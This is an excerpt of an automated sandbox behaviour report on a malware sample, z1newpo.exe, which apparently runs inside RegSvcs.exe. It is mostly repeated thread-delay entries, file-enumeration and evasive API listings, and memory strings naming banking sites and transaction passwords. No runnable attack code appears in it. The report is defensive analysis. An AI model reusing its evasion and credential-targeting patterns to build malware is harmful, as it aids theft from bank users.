                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596283
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596166
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595978
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595621
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595391
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594577
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599407
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598430
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596101
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595773
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595657
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593985
                    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7353
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2483
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7043
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2779
                    Source: C:\Users\user\AppData\Local\directory\name.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\z1newpo.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\z1newpo.exe API coverage: 3.4 %
                    Source: C:\Users\user\AppData\Local\directory\name.exe API coverage: 3.7 %
                    Source: C:\Users\user\AppData\Local\directory\name.exe API coverage: 3.5 %
                    Source: C:\Users\user\Desktop\z1newpo.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
                    Source: C:\Users\user\Desktop\z1newpo.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\Desktop\z1newpo.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                    Source: C:\Users\user\Desktop\z1newpo.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
                    Source: C:\Users\user\Desktop\z1newpo.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
                    Source: C:\Users\user\Desktop\z1newpo.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\Desktop\z1newpo.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
                    Source: C:\Users\user\Desktop\z1newpo.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose
                    Source: C:\Users\user\Desktop\z1newpo.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
                    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,2_2_004339B6
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,2_2_0045CAFA
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00431A86
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,2_2_0044BD27
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0045DE8F FindFirstFileW,FindClose,2_2_0045DE8F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0044BF8B
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_00452492
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00442886
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_004788BD
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,12_2_004339B6
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,12_2_0045CAFA
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00431A86
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,12_2_0044BD27
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0045DE8F FindFirstFileW,FindClose,12_2_0045DE8F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0044BF8B
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599433
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598736
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597983
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596283
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596166
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595978
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595621
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595391
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594577
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599407
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598430
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596101
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595773
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595657
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: RegSvcs.exe, 0000000D.00000002.3691769628.00000000038F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
